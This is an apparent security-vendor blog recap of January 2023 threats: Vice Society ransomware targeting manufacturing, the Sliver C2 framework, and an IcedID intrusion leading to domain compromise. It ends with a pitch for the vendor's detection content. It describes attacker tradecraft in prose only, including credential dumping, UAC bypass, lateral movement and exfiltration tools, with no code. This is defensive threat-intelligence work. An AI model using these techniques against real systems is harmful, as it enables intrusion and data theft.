The Anvilogic Forge team provides a recap of monthly trending threats. The community intelligence we collect is molded into actionable defense strategies to help defend your organization from the biggest emerging threats.
What’s Surging? Our Picks of The Most Thunderous News From January 2023
(1) The Manufacturing Industry a Frequent Target of Vice Society
Category: Ransomware News | Source: Trend Micro
The Vice Society ransomware gang made headlines for their attacks against academic institutions and healthcare organizations. While the vertical remains a top target for the cybercrime group, telemetry data from Trend Micro reveals that the manufacturing industry has also been a prominent target for Vice Society. As reported on their latest blog post, "through Trend Micro’s telemetry data, we have evidence that the group is also targeting the manufacturing sector, which means that they have capability and desire to penetrate different industries — most likely accomplished via the purchasing of compromised credentials from underground channels. We have detected the presence of Vice Society in Brazil (primarily affecting the country’s manufacturing industry), Argentina, Switzerland, and Israel." Statistics of the industries impacted by Vice Society based on victims listed on the group's data leak site shows education leads with 51 entries, followed by manufacturing at 32, healthcare at 22, government at 10, and financial services at 5.
Since November 2022, Vice Society has created and deployed its own ransomware encryptor, previously they used FiveHands, Zeppelin, and Hello Kitty ransomware variants. A Vice Society intrusion was observed on October 28th, 2022, with the ransomware deployment completed on November 12th, 2022. The arrival vector for the attack is assessed to be through the exploit of a public-facing application or RDP access from compromised credentials. Tools used in the attack included Cobalt Strike, Rubeus, Mimikatz, Kape, and a PowerShell script to create an admin account. Following the account creation, several running processes were terminated to enable the ransomware encryptor to run without any hindrances. The ransomware cleared its tracks by clearing event logs, deleting RDP registry keys, and deleting the malware from the infected system.
(2) Sliver C2 Framework Growing Its Base
Category: Threat Actor Activity | Source: Cybereason
Obtaining remote control over a compromised system through the abuse of attack frameworks has become a staple in an attacker's arsenal. While Cobalt Strike reigns as the most widely used framework, Cybereason researchers provide an in-depth guide to the underreported and steadily growing Sliver C2 framework, created by cybersecurity firm Bishop Fox. Core features of Sliver include cross-platform capability with Windows and Linux, shell access, UAC bypass for privilege escalation, system reconnaissance, process injection, lateral movement with PsExec, use of SOCKs for C2, and additional modules capable of accessing system credentials. The Sliver framework comprises four components a server and client console to interface with, the C2 server, and the implant. Threat actors who leverage Sliver include APT29, TA551 (aka Shathak), and Exotic Lily using Sliver in BumbleBee infections.
Cybereason also shared a logical attack path that can be used during a Sliver infection. "Sliver is designed as a second-stage payload which, after deployment, gives the threat actor full access to the target system and the ability to conduct the next steps in the attack chain. Silver is capable of running in beacon mode to provide periodic checks or an interactive real-time session mode. Once the C2 implant is executed, the operator could run reconnaissance commands to gain context on the system and escalate privileges. User Account Control bypass is demonstrated as one method to achieve elevated privileges using cmpstp.exe a native windows binary. Using the 'migrate' command in Silver's shell the operator can inject the C2 implant into a remote process to evade detection. For credential access several options are available procdump to dump "lsass", Rubeus, pypykatz (offline), alternatively the operator can download and run Mimikatz. Once the operator decides to move laterally, they can leverage the built-in remote admin tool PsExec.
(3) An IcedID Infection Leads to Domain Compromise in Under 24hrs
Category: Threat Actor Activity | Source: Cybereason
The Cybereason threat analysis team provided research of an IcedID infection resulting in the compromise of the organization's active directory domain in under 24 hours and data exfiltration in under three days following the initial infection. IcedID is assessed by Cybereason to be "used more as a dropper for other malware families and as a tool for initial access brokers." Analysis of the intrusions begins with a user executing a compressed zip archive containing an ISO and shortcut (LNK) file executing a batch script and malicious DLL to download the IcedID malware. Rundll32 was used prominently in the initial stages executing the initial DLL file in the TEMP directory, running IcedID payloads, creating a scheduled task, and calling a cmd process to download additional scripts.
Cobalt Strike launches using regsvr32, after the initial foothold is established. Routine usage of Cobalt Strike was observed following reconnaissance, credential access, and lateral movement resulting in a standardized attack flow. Throughout the post-exploitations, influences of various threat groups were found based on their tactics, techniques, and procedures (TTPs). "Several of the TTPs we observed have also been found in attacks attributed to Conti, Lockbit, FiveHands, and others. Not only does this show a trend towards attackers sharing ideas across groups, but this also demonstrates how the ability to detect the techniques and tactics of one group can be applied to detecting others." To move laterally, the threat actors used WMIC, and for credential access, a Rubeus tool was used for Kerberoasting and DCSync to dump credentials. The attackers ceased activity following domain compromise with the next majority activity of a Citrix server login 26 hours after DCSync was used. To establish an additional backdoor, the attackers installed the Atera remote administration tool, a Conti tactic, and exfiltrated data using a renamed Rclone process similar to Lockbit.
Grounding the Storm with Detections from the Forge
Using the intelligence gathered from Trend Micro’s report for Vice Society allows us to capture threat behaviors exhibited for their campaigns and sequence their actions into a threat scenario. Despite the initial access vector being uncertain and predicted as RDP access, the flexibility of the Anvilogic Forge’s scenario builder enables us to supply an alternative route. By incorporating credential access detections, we are supporting the first stage in our detection with two high-fidelity starting points. Our scenario proceeds to identify activity observed from Vice Society operators executing a PowerShell script leading to system modifications in Windows Defender, the registry, or even persistence established with a new user account.
The result of our threat scenario is a reconstruction of Vice Society’s attack path. Whilst this detection was derived from a Vice Society campaign, the goal isn’t to strictly monitor for the ransomware gang, rather our work at the Anvilogic Forge is to create detections focused on behaviors associated with threat actor’s tactics, techniques and procedures (TTPs). These threat scenarios are created from all the top stories the Anvilogic Forge team examines.
The Anvilogic Armory contains over 1,500 detections created by the Forge content development and research teams to help you defend your network. These trending topics can be found in our Armory with content already mapped to help you quickly deploy detection and secure your environment.